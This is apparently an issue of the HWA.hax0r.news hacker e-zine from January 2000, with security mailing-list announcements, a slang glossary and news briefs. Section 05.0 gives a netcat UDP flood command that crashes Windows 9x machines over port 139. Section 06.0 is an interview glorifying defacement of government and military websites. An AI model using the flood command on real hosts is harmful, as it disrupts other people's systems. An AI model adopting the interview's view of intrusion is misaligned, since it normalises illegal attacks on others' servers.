As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP
(Spanish) which will be moderated by CORE SDI S.A. from Argentina
(the folks that brought you Secure Syslog and the SSH insertion
attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with
building this new community. The other staff at Security Focus are
largely derived from long time supporters of Bugtraq and the
community in general. If you are interested in viewing the staff
pages, please see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums
and mailing lists we hope you will find useful.
A number of them are not scheduled to start for several weeks but
starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the
  discussion of new vulnerabilities. As such I normally don't approve
  messages about break-ins, trojans, viruses, etc with the exception
  of wide spread cases (Melissa, ADM worm, etc). The other choice
  people are usually left with is email CERT but this fails to
  communicate this important information to others that may be
  potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information.
  Topical items include such things as information about rootkits,
  new trojan horses and viruses, source of attacks and tell-tale
  signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
  of:

            SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred
Huger, ahuger@securityfocus.com.

On the information resource front you find a large database of
the following:

* Vulnerabilities. We are making accessible a free vulnerability
  database. You can search it by vendor, product and keyword. You
  will find detailed information on the vulnerability and how to fix
  it, as well as links to reference information such as email
  messages, advisories and web pages. You can search by vendor,
  product and keywords. The database itself is the result of culling
  through 5 years of BUGTRAQ plus countless other lists and news
  groups.
  It's a shining example of how thorough full disclosure has made a
  significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products
  from over two hundred different vendors.

* Services. A large and focused directory of security services
  offered by vendors.

* Books, Papers and Articles. A vast number of categorized security
  related books, papers and articles. Available to download directly
  from our servers when possible.

* Tools. A large array of free security tools. Categorized and
  available for download.

* News: A vast number of security news articles going all the way
  back to 1995.

* Security Resources: A directory to other security resources on
  the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an
inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                            ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away..

Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occurred, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.

As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. They are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.

The subject line will always contain the title of the article, so that
you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security
  encryption, products, public hacks, hoaxes, legislation affecting
  these topics and more.

o Information on where to obtain articles in current magazines.

o Security Book reviews and information.

o Security conference/seminar information.

o New security product information.

o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:

* subscribe vanity mail forwards to this list

* subscribe from 'free' mail addresses (ie: juno, hotmail)

* enable vacation messages while subscribed to mail lists

* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).

Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of
topics, member subscription, and everything else about the list is
solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe:

send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you
have any questions or comments about the list please feel free to
contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list.
This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,)
is geared towards promoting the open discussion of Windows-related
security issues.

With a firm and unwavering commitment towards timely full disclosure,
this new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits,
virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense
of community and we openly invite all security minded individuals, be
they white hat, gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending
product line name change, and meant to reflect the list's security focus
both now and in the long run, it is by no means limited to security
topics centered around Windows 2000. Any security issues that pertain to
Windows-based networking are relevant for discussion, including all
Windows operating systems, MS Office, MS BackOffice, and all related
third party applications and hardware.

The scope of Win2KSecAdvice can be summarized very simply: if it's
relevant to a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable
list archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net

Regards,

Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

00.3  THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ...
- Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a BIG
   WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of
   recent news events it's a good idea to check out issue #1 at least
   and possibly also the Xmas issue for a good feel of what we're all
   about otherwise enjoy - Ed ...

@HWA

00.4  What's in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Praetorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' this is the state of affairs. It ain't
Steven Levy's HACKERS anymore. BTW to all you up and comers, i'd
highly recommend you get that book. It's almost like buying a clue.
Anyway..on with the show .. - Editorial staff

@HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3.
(revised) check that issue for the faq it won't be reprinted unless
changed in a big way with the exception of the following excerpt from
the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA   - see EoA ;-)

!=     - Mathematical notation "is not equal to" or "does not equal"
         ASC(247) "wavy equals" sign means "almost equal" to. If written
         as =/= (equals sign with a slash thru it) also means !=, =< is
         Equal to or less than and => is equal to or greater than (etc,
         this aint fucking grade school, cripes, don't believe I just
         typed all that..)

AAM    - Ask a minor (someone under age of adulthood, usually <16, <18
         or <21)

AOL    - A great deal of people that got ripped off for net access by a
         huge clueless isp with sekurity that you can drive buses
         through, we're not talking Kung-Fu being none too good here,
         Buy-A-Kloo maybe at the least they could try leasing one??

*CC    - 1 - Credit Card (as in phraud)
         2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC    - Chaos Computer Club (Germany)

*CON   - Conference, a place hackers crackers and hax0rs among others go
         to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
         gear, get drunk watch videos and seminars, get drunk, listen to
         speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
           hacker speak he's the guy that breaks into systems and is
           often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice
           dip, I like jalapeno pepper dip or chives sour cream and
           onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak
          using ebonics, speaking in a dark tongue ...
          being ereet, see pheer

EoC    - End of Commentary

EoA    - End of Article or more commonly @HWA

EoF    - End of file

EoD    - End of diatribe (AOL'ers: look it up)

FUD    - Coined by Unknown and made famous by HNN - "Fear uncertainty
         and doubt", usually in general media articles not high brow
         articles such as ours or other HNN affiliates ;)

du0d   - a small furry animal that scurries over keyboards causing
         people to type weird crap on irc, hence when someone says
         something stupid or off topic 'du0d wtf are you talkin about'
         may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see
          HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
         is difficult to define, I think it is best defined as pop
         culture's view on The Hacker ala movies such as well erhm
         "Hackers" and The Net etc... usually used by "real" hackers or
         crackers in a derogatory or slang humorous way, like 'hax0r me
         some coffee?' or 'can you hax0r some bread on the way to the
         table please?'
         2 - A tool for cutting sheet metal.

HHN    - Maybe a bit confusing with HNN but we did spring to life around
         the same time too, HWA Hax0r News.... HHN is a part of HNN ..
         and HNN as a proper noun means the hackernews site proper.
         k? k. ;&

HNN    - Hacker News Network and its affiliates
         http://www.hackernews.com/affiliates.html

J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC    - Depends on context: No Further Comment or No Fucking Comment

NFR    - Network Flight Recorder (Do a websearch) see 0wn3d

NFW    - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS  - Oh for christ's sakes

PHACV  - And variations of same
         Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
         Virus, Warfare

         Alternates: H - hacking, hacktivist
                     C - Cracking
                     C - Cracking
                     V - Virus
                     W - Warfare
                     A - Anarchy (explosives etc, Jolly Roger's Cookbook
                         etc)
                     P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your
         presence see 0wn3d

*RTFM  - Read the fucking manual - not always applicable since some
         manuals are pure shit but if the answer you seek is indeed in
         the manual then you should have RTFM you dumb ass.

TBC    - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA    - To Be Arranged/To Be Announced also 2ba

TFS    - Tough fucking shit.

*w00t  - 1 - Reserved for the uber ereet, no one can say this without
         severe repercussions from the underground masses. also "w00ten"
         2 - Cruciphux and sAs72's second favourite word (they're both
         shit stirrers)

*wtf   - what the fuck, where the fuck, when the fuck etc ..

*ZEN   - The state you reach when you *think* you know everything (but
         really don't) usually shortly after reaching the ZEN like state
         something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0  Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.

* all the people who sent in cool emails and support

FProphet    Pyra        TwstdPair   _NeM_
D----Y      Dicentra    vexxation   sAs72
Spikeman    p0lix       Vortexia    Wyze1
Pneuma      Raven       Zym0t1c     duro
Repluzer    astral      BHZ         ScrewUp
Qubik       gov-boi     _Jeezus_    Haze_
thedeuce    ytcracker   loophole    BlkOps

Folks from #hwa.hax0r.news and #fawkerz, and other leet secret channels,
mad props! ... ;-)

Ken Williams/tattooman ex-of PacketStorm,

& Kevin Mitnick

Kevin is due to be released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/

kewl sites:

+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1  Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
 always popular..."
                    - FProphet '99

+++ When was the last time you backed up your important data?

++ FBI Investigating 20 Y2K threats

   The FBI said Thursday it had moved to thwart up to 20 or so possible
   threats against targets such as power plants and computer networks
   during a heightened security watch that started before 2000 dawned.

   Read the article at:
   http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop

++ L0pht joins e-security firm

   L0pht Heavy Industries to serve as research and development arm for
   new company hoping to secure e-commerce.
   CAMBRIDGE, Mass. - Armed with $10 million in venture funding and a
   phalanx of Internet industry veterans, startup firm AtStake Inc. on
   Thursday announced plans to help secure the e-commerce revolution.

   Read the article at:
   http://www.zdnet.com/zdnn/stories/news/0,4586,2417831,00.html?chkpt=zdnntop
   Read the dutch article at:
   http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4054

++ Microsoft under media attack in China

   Software giant Microsoft Corp. has run into more bad publicity in
   China with a newspaper reporting that its latest Windows 2000
   operating system will be barred throughout the government.
     Instead, ministries would use "Red Flag-Linux," a new software platform
     developed by Chinese researchers and based on upstart operating system
     Linux.

     Read the article at:
     http://www.zdnet.com/zdnn/stories/news/0,4586,2417828,00.html
     Read the Dutch article at:
     http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4141

  ++ China will handle piracy

     Unless pirates hand in all their illegal audio and DVD copies before
     January 15th, the Chinese authorities will take measures. Pirates may
     then expect heavy penalties.

     Read the (short) Dutch article at:
     http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4140

  ++ Y2K-patch crashes important flight control systems

     Representatives of the American union Professional Airway Systems
     Specialists (PASS) claim that important flight control systems crashed
     because of a Y2K-patch installed by the Federal Aviation Administration
     (FAA). Because of this, airplanes weren't able to take off on the east
     side of the US.

     Read the Dutch article at:
     http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4137

  ++ Clinton declares war on cyberterrorists

     WASHINGTON - The White House planned to announce on Friday new steps
     to protect America's computer systems from hackers and viruses. These
     steps also include education subsidies for college students if they
     agree to work for the government after developing computer-security
     skills.

     Read the article at:
     http://www.zdnet.com/zdnn/stories/news/0,4586,2418619,00.html?chkpt=zdnntop

  ++ Teen hacks 27 ISPs, gains root access

     A 16-year-old hacker affiliated with the cybergang known as Global
     Hell compromised at least 27 Internet service providers late last
     year, stealing passwords and, in some cases, destroying data,
     according to details of a police investigation released Monday.
     Read the article at:
     http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop

  ++ Data thief blackmails e-tailer

     eUniverse (an online retailer) confirmed Monday that it was the victim
     of a data theft and virtual blackmail attempt over the weekend. A
     19-year-old Russian hacker demanded $100 000 from CD Universe,
     threatening to otherwise publish thousands of credit card codes on the
     net, and so he did.

     Read the article at:
     http://www.zdnet.com/zdnn/stories/news/0,4586,2419750,00.html
     Read the Dutch article at:
     http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4173

  ++ Reno rallies cybercrime fighters

     U.S. Attorney General Janet Reno on Monday outlined plans for the
     federal government to battle all cybercrime by teaming up with U.S.
     states to establish a secure online information clearinghouse.

     Read the article at:
     http://www.zdnet.com/zdnn/stories/news/0,4586,2419984,00.html

     Thanks to myself for providing the info from my wired news feed and
     others from whatever sources, Zym0t1c and also to Spikeman for sending
     in past entries.... - Ed

  @HWA

01.2  MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Yeah we have a message board, feel free to use it, remember there are
      no stupid questions... well there are but if you ask something really
      dumb we'll just laugh at ya, let's give the message board a bit more
      use eh? i'll be using a real message board when the hwa-iwa.org domain
      comes back online (soon?) meanwhile the beseen board is still up...

==============================================================================

02.0  From the editor.
      ~~~~~~~~~~~~~~~~

      #include <stdio.h>

      int main(void)
      {
       printf ("Read commented source!\n\n");

      /*
       * Hey, the world didn't end at 23:59 12/31/99 wow huh?
       * well i've been busy so you're getting more than two weeks worth
       * of news in one issue.
       * Sorry if this doesn't waggle yer wig but
       * I decided it would be better than releasing two issues again.
       *
       * This issue sports a few interviews with underground figures
       * if there is anyone that you'd like interviewed or want to
       * offer yourself up, email me and we'll work something out, or
       * at least try to. Meanwhile, enjoy the issue and tty next time
       *
       * This issue: fuqrag, ytcracker and mosthated.
       *
       * Cruci
       *
       * cruciphux@dok.org
       * ICQ:58939315 note; not always online, do not abuse!
       * Preferred chat method: IRC Efnet in #HWA.hax0r.news
       *
       */
       printf ("EoF.\n");
      }

      Snailmail:

          HWA NEWS
          P.O BOX 44118
          370 MAIN ST. NORTH
          BRAMPTON, ONTARIO
          CANADA
          L6V 4H5

      Congrats, thanks, articles, news submissions and kudos to us at the
      main address: hwa@press.usmc.net complaints and all nastygrams and
      mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
      127.0.0.1, private mail to cruciphux@dok.org

      danke.

      C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

                              Content Start

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0  www.2600.com, jokers to the end?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      On New Year's Day visitors to the venerable 2600.com site were
      greeted with the following:

      Internal Server Error

      The date specified (01-01-1900) is impossible. If you have forced
      this error condition, you may be in violation of state, federal,
      and/or civil laws. Those outside the United States should check with
      their respective governments concerning their country's extradition
      treaty. Dissemination of this error is also strictly prohibited. If
      you believe you have received this message in error, please reload
      the page and try again.
      -=-

      It looks realistic but we're pretty sure that it was not generated by
      the server and is actually a phake error message... - Ed

  @HWA

04.0  More irc4all proxies (01/03/00)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The info from below is taken from the site located at
      http://www.lightspeed.de/irc4all/ it offers an up to date list of
      various proxies, mostly public, some not, check it out for further
      details. - Ed
  @HWA

05.0  Simple Windows DoS using common tools and UDP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HWA labs: Twstdpair

      This is a very simple but deadly Windows DoS that appears to work on
      all Win9x boxes. You need a large binary file as the datafile
      (fuckfile.bin) to create a long stream of data; we used an 80 meg
      binary file for test purposes. Essentially you will be flooding the
      well known netbios TCP/UDP port 139; in this case we'll be attacking
      with UDP packets. The result is that the attacked system will falter
      and eventually fail, making it essentially useless and losing net
      connection.

      "Discovered" accidentally by Twstdpair, when retaliating against some
      unruly port scanning kiddies harassing his system. :-p

      Usage:

      You need netcat for this example.
      > cat fuckfile.bin | nc -u 24.111.111.111 139

      You can issue this attack from *nix boxes or from windows using the
      windows netcat port. System will become unresponsive and eventually
      die.

  @HWA

06.0  Slash interviews website defacer/cracker Fuqrag Jan 10th 2000
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      HWA Exclusive. You may reproduce this if credit is given for the
      source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate.

sure.. why not > Tell us something about You ? ! > How did U start defacing > ? well.. there are tons of reasons why i did what i did.. (and still might do.. not sure yet) but.. i started mostly cause i was extremely bored > bored ?! yeah.. as in had nothing else better to do > :))) > so U started defacing..... plus.. i was also depressed over my gf dumping me.. > :) > :( and some other things as well yeah.. i'd never been into defacing shit before > how llong have U been hacking !? didn't really have a reason to damn.. let's see.. i just turned 30 back in october and i've been in the scene since like when i was 12 so.. damn.. that's a long time > :))))) > that's long > how did U start hacking !?? ! > was it the BBS age back then !? hangin out with the wrong (or maybe right) people on bbs's .. shit like that > so why did U stop defacing !? mostly to take a break... and give the .gov's & .mil's a break as well.. as well as every 1 else in between > but why did U hit all those high profiled sites > !?! > why .mil and .gov the bigger the better i figured this.. it's like.. if you're gonna scream your head off.. then get on top of the biggest buildings.. and then scream > Is there an defacment that U'r most proud of > ? hmm.. several actually hard to pick just 1 > which R that !? the NSA website, DiSA, deca.mil, usitc.gov, the coe.fr, and probably the intelsat.int, as well as the 2 nato sites..
also kingston.com that was my last 1 and it was on thanksgiving day ;) > :) and let's not forget dairyqueen heh > hehe > U declared war to the Government on U'r deca.mil defacment right !? sorta but not really pretty much every 1 any 1 with power that abuses it (be it country or company) > What do You think of the FBI ?!:) you really wanna know what i think about the fbi? uhmm.. ok they're a bunch of fuckin morons > :)))) > that's true > :) > U ain't afraid to get raided !? yeah not really > how is that !? fuck'em if they can't take a joke! i mean like.. what's to be afraid of ya know? > well.... > U can go to jail the worst that can happen is i go to prison.. > well, that's it > U goto jail > and U'r life is all fucked up yeah.. but as long as i remain who i am, as an individual... > U can't get a job in my thoughts.. my beliefs.. > everyone thinks U killed somebody > I'll tell U sumtin > Hacking changed my life > for good > That's my obsesion > Hacking is a state of mind baby > and I don't give a fuck If I get raided i agree > do U ? absolutely > I meen i know the defacing stuff is not cool > yeah > but > I deface to spread the message out > I don't give a fuck about fame > fame meens nothing to me neither do i tell ya the truth... i honestly didn't think any 1 would care or even notice i figured that there was so much shit already being hit before i came along.. that i didn't think it would really matter > But people did notice and i'm not really into interviews and stuff.. but, that's why only people like you, and osall, etc.. not the nytimes.. or cnn, etc.. shit like that i know they did if i'd known that i was gonna get the kindof attention that i have gotten before i started... i would've re-thought my actions i'm actually a very private person usually keep to myself most of the times > U married !? > :) heh no > :( > so what do U do in U'r life !? me and my ex- were together 3+ years.. we were suppose to get married like next summer.. but.. 
oh well actually.. i'm a freelance security consultant ;) > :) > that suits U fine yeah.. but i went to filmschool > yeah !? that's what i use to wanna do and maybe some day i still will.. who knows > "Hackers the sequel " by fuqraq heheh uhmm.. not quite i was interviewed for a documentary awhile back though it's called: "Hackers, Crackers, and Lamers" > no shit > :))) some chick that does documentaries for cnn or some shit yeah they actually filmed me doing "live-hacks" > U heard of flipz !? > :) heh yeah > U 2 know each other !? we have our differences from time to time.. but.. we always end up still being good friends > kewl he annoys the shit out of me.. but he's still cool > U were in gH and sSH ?! gH yes.. sSh no.. > no !? even though they put me on their member's list (i dunno why).. i was never a member > I thought I saw U in their members list not even an affiliate sSh is a bunch of lamers with nuthin better to do > U plan to start hacking again ? dude.. i'm always hackin > :))) > aaight just not defacin right at the moment and not nt bawx's either > NT sux i fuckin hate nt yeah it does > I advise people to put BSD or SunOS > but no yeah.. > They R smarter than me > "We will put what we want" i run linux (SuSE), and NetBSD mostly > They:"sumtin what is easy to use" > ME: "Sumting that is easy to penetrate in" heheh > They:"U'r fired" definitely the latter ME: aight.. go ahead and be a loser heheh > ME:" ok, just wait till I get home and find some sploit for Youre box" > heheh no doubt > bsd is coo > Never tried suse doh i like it SuSE is nice > I heard it comes on 7 cd-s 6 > heh ;) > U code !? a little > c !? > perl !? some c (just startin to get really heavy in it) perl, shell script, pascal yes.. i do have pascal on my linux bawx > :))) heh > I have VB on my linux box really..? > can U belive it !? under wine? > y coz.. under windows.. i do mostly vb > no shit > me too yeah.. 
i love vb > it's good i got started usin it years back, when i was makin front-ends for access db's also do some xbase legacy code (like fox pro, etc..) > I started programing in qb firsth > I knew only 1 command > U know what that was !? yeah.. me too actually.. i started with gwbasic > kewl under like dos 3.1 or some shit like that > the first command I learned in qb was.... > BEEP > :)))))) heh that's cool > Than i started learning > IF then ahhh.. the memories > for NExtT > N shit > then came VB > winsock programing > aaaaaargghhhhhh > winsock1.open > shit > :))))) heh > It's coo to program > to know how to program yeah it is > U on win box now !? most people take it for granted no linux > k i'm always in unix of some sort > aaight > dewd lately i've been rewtin bawx's in china & korea ya? > can U do me a favor !? what's that? > www.akz.hr > I'm kinda admin on that box > can U check it out > do a /whois slasht sure.. > U'll see I come from rtr.akz.hr > don't deface plz > I know U can :)))) heh.. i won't > just gimme some proof what do u want me to do.. just check it out on security and shit? > yeah > winNT 40 > :))) ok.. > k but.. > what !? i'm not really that much into nt.. > well, just try and i only know a few ways of gettin in.. that's about it > ok > I'm a shitty admin > so It shouldn't be a problem > :)))))) well.. > well... > ? nt isn't that hard to admin > I know > :))))) and on top of that i don't know all of the vulnerabilities for nt > I'm kinda into solaris 'n stuph me too i won't say that i don't use scripts.. sure i do.. every 1 does.. but, when it comes to nt, that's usually how i've had to get in.. except maybe port 139.. and even then so i guess i could sit around and try to brute ur pop3 > :))) every 1 thinks i know alot about NT and shit.. but i never claimed i was anything great.. i have your shit is safe from msadc > 